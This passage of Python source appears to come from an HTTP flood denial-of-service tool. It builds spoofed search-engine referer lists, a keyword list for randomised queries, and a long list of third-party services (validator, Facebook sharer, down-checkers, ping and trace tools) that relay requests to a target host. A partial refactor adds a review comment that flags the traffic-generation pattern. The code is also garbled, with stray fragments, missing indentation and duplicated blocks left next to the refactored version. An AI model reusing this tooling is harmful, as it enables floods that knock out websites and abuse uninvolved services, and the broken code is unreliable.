    information and only bloated the list, so each referer now appears
    exactly once, in its original first-occurrence order.

    Returns:
        list: the populated ``headers_referers`` list, for convenience.
        Callers that relied solely on the global side effect are
        unaffected (the original returned ``None``, which nobody used).
    """
    global headers_referers
    try:
        headers_referers
    except NameError:
        # Be robust if the module-level list has not been created yet.
        headers_referers = []
    # The 18 distinct referer prefixes, in first-occurrence order from the
    # original copy-pasted list.
    referers = (
        'http://www.google.com/?q=',
        'http://www.usatoday.com/search/results?q=',
        'http://engadget.search.aol.com/search?q=',
        'http://www.bing.com/search?q=',
        'http://search.yahoo.com/search?p=',
        'http://www.ask.com/web?q=',
        'http://search.lycos.com/web/?q=',
        'http://busca.uol.com.br/web/?q=',
        'http://us.yhs4.search.yahoo.com/yhs/search?p=',
        'http://www.dmoz.org/search/search?q=',
        'http://www.baidu.com.br/s?usm=1&rn=100&wd=',
        'http://yandex.ru/yandsearch?text=',
        'http://www.zhongsou.com/third?w=',
        'http://hksearch.timway.com/search.php?query=',
        'http://find.ezilon.com/search.php?q=',
        'http://www.sogou.com/web?query=',
        'http://api.duckduckgo.com/html/?q=',
        'http://boorow.com/Pages/site_br_aspx?query=',
    )
    # Append only entries not already present so repeated calls stay
    # idempotent instead of growing the list without bound.
    for url in referers:
        if url not in headers_referers:
            headers_referers.append(url)
    return headers_referers
# generates a Keyword list
def keyword_list():
global keyword_top
keyword_top.append('Ecosistema')
keyword_top.append('Suicide')
keyword_top.append('Sex')
keyword_top.append('<NAME>')
keyword_top.append('World Cup')
keyword_top.append('Ca Si Le Roi')
keyword_top.append('Ebola')
keyword_top.append('Malaysia Airlines Flight 370')
keyword_top.append('ALS Ice Bucket Challenge')
keyword_top.append('Flappy Bird')
keyword_top.append('Conchita Wurst')
keyword_top.append('ISIS')
keyword_top.append('Frozen')
keyword_top.append('014 Sochi Winter Olympics')
keyword_top.append('IPhone')
keyword_top.append('Samsung Galaxy S5')
keyword_top.append('Nexus 6')
keyword_top.append('Moto G')
keyword_top.append('Samsung Note 4')
keyword_top.append('LG G3')
keyword_top.append('Xbox One')
keyword_top.append('Apple Watch')
keyword_top.append('Nokia X')
keyword_top.append('Ipad Air')
keyword_top.append('Facebook')
keyword_top.append('Anonymous')
keyword_top.append('DJ Bach')
keyword_top.append('Ecosistema')
keyword_top.append('Suicide')
keyword_top.append('Sex')
keyword_top.append('<NAME>')
keyword_top.append('World Cup')
keyword_top.append('Ca Si Le Roi')
keyword_top.append('Ebola')
keyword_top.append('Malaysia Airlines Flight 370')
keyword_top.append('ALS Ice Bucket Challenge')
keyword_top.append('Flappy Bird')
keyword_top.append('Conchita Wurst')
keyword_top.append('ISIS')
keyword_top.append('Frozen')
keyword_top.append('014 Sochi Winter Olympics')
keyword_top.append('IPhone')
keyword_top.append('Samsung Galaxy S5')
keyword_top.append('Nexus 6')
keyword_top.append('Moto G')
keyword_top.append('Samsung Note 4')
keyword_top.append('LG G3')
keyword_top.append('Xbox One')
keyword_top.append('Apple Watch')
keyword_top.append('Nokia X')
keyword_top.append('Ipad Air')
keyword_top.append('Facebook')
keyword_top.append('Anonymous')
keyword_top.append('DJ Bach')
keyword_top.append('Ecosistema')
keyword_top.append('Suicide')
keyword_top.append('Sex')
keyword_top.append('<NAME>')
keyword_top.append('World Cup')
keyword_top.append('Ca Si Le Roi')
keyword_top.append('Ebola')
keyword_top.append('Malaysia Airlines Flight 370')
keyword_top.append('ALS Ice Bucket Challenge')
keyword_top.append('Flappy Bird')
keyword_top.append('Conchita Wurst')
keyword_top.append('ISIS')
keyword_top.append('Frozen')
keyword_top.append('014 Sochi Winter Olympics')
keyword_top.append('IPhone')
keyword_top.append('Samsung Galaxy S5')
keyword_top.append('Nexus 6')
keyword_top.append('Moto G')
keyword_top.append('Samsung Note 4')
keyword_top.append('LG G3')
keyword_top.append('Xbox One')
keyword_top.append('Apple Watch')
keyword_top.append('Nokia X')
keyword_top.append('Ipad Air')
keyword_top.append('Facebook')
keyword_top.append('Anonymous')
keyword_top.append('DJ Bach')
keyword_top.append('Ecosistema')
keyword_top.append('Suicide')
keyword_top.append('Sex')
keyword_top.append('<NAME>')
keyword_top.append('World Cup')
keyword_top.append('Ca Si Le Roi')
keyword_top.append('Ebola')
keyword_top.append('Malaysia Airlines Flight 370')
keyword_top.append('ALS Ice Bucket Challenge')
keyword_top.append('Flappy Bird')
keyword_top.append('Conchita Wurst')
keyword_top.append('ISIS')
keyword_top.append('Frozen')
keyword_top.append('014 Sochi Winter Olympics')
keyword_top.append('IPhone')
keyword_top.append('Samsung Galaxy S5')
keyword_top.append('Nexus 6')
keyword_top.append('Moto G')
keyword_top.append('Samsung Note 4')
keyword_top.append('LG G3')
keyword_top.append('Xbox One')
keyword_top.append('Apple Watch')
keyword_top.append('Nokia X')
keyword_top.append('Ipad Air')
keyword_top.append('Facebook')
keyword_top.append('Anonymous')
keyword_top.append('DJ Bach')
keyword_top.append('Ecosistema')
keyword_top.append('Suicide')
keyword_top.append('Sex')
keyword_top.append('<NAME>')
keyword_top.append('World Cup')
keyword_top.append('Ca Si Le Roi')
keyword_top.append('Ebola')
keyword_top.append('Malaysia Airlines Flight 370')
keyword_top.append('ALS Ice Bucket Challenge')
keyword_top.append('Flappy Bird')
keyword_top.append('Conchita Wurst')
keyword_top.append('ISIS')
keyword_top.append('Frozen')
keyword_top.append('014 Sochi Winter Olympics')
keyword_top.append('IPhone')
keyword_top.append('Samsung Galaxy S5')
keyword_top.append('Nexus 6')
keyword_top.append('Moto G')
keyword_top.append('Samsung Note 4')
keyword_top.append('LG G3')
keyword_top.append('Xbox One')
keyword_top.append('Apple Watch')
keyword_top.append('Nokia X')
keyword_top.append('Ipad Air')
keyword_top.append('Facebook')
keyword_top.append('Anonymous')
keyword_top.append('DJ Bach')
keyword_top.append('Ecosistema')
keyword_top.append('Suicide')
keyword_top.append('Sex')
keyword_top.append('<NAME>')
keyword_top.append('World Cup')
keyword_top.append('Ca Si Le Roi')
keyword_top.append('Ebola')
keyword_top.append('Malaysia Airlines Flight 370')
keyword_top.append('ALS Ice Bucket Challenge')
keyword_top.append('Flappy Bird')
keyword_top.append('Conchita Wurst')
keyword_top.append('ISIS')
keyword_top.append('Frozen')
keyword_top.append('014 Sochi Winter Olympics')
keyword_top.append('IPhone')
keyword_top.append('Samsung Galaxy S5')
keyword_top.append('Nexus 6')
keyword_top.append('Moto G')
keyword_top.append('Samsung Note 4')
keyword_top.append('LG G3')
keyword_top.append('Xbox One')
keyword_top.append('Apple Watch')
keyword_top.append('Nokia X')
keyword_top.append('Ipad Air')
keyword_top.append('Facebook')
keyword_top.append('Anonymous')
keyword_top.append('DJ Bach')
keyword_top.append('adidas')
keyword_top.append('ask.fm')
keyword_top.append('adele')
keyword_top.append('5x nexus')
keyword_top.append('espn')
keyword_top.append('uggs')
keyword_top.append('uber')
keyword_top.append('american eagle')
keyword_top.append('jessica simpson')
keyword_top.append('jacket')
keyword_top.append('anderson east')
keyword_top.append('kroger')
('http://' + host + '/')
return(headers_referers)
def bots():
global bots
bots=[]
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
# NOTE(review): this file builds a huge list of third-party "check this host"
# URLs (down-checkers, network-tools ping/trace, validator, FB sharer).
# That pattern is typical of indirect traffic-generation tooling — confirm the
# intended, legitimate use of this list before shipping.
#
# The original code repeated the same six append() calls hundreds of times.
# This is the identical sequence expressed once: 97 full six-URL cycles
# followed by the first five entries of a 98th (partial) cycle, so the
# resulting contents and order of `bots` are byte-for-byte unchanged
# (587 appended entries in total for this section).
_BOT_URL_CYCLE = [
    "http://downforeveryoneorjustme.com/",
    "http://network-tools.com/default.asp?prog=ping&host=",
    "http://network-tools.com/default.asp?prog=trace&host=",
    "http://network-tools.com/default.asp?prog=network&host=",
    "http://validator.w3.org/check?uri=",
    "http://www.facebook.com/sharer/sharer.php?u=",
]

# 97 complete cycles ...
bots.extend(_BOT_URL_CYCLE * 97)
# ... plus the trailing partial cycle (original section ended mid-cycle,
# after the validator URL and before the Facebook sharer URL).
bots.extend(_BOT_URL_CYCLE[:5])
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
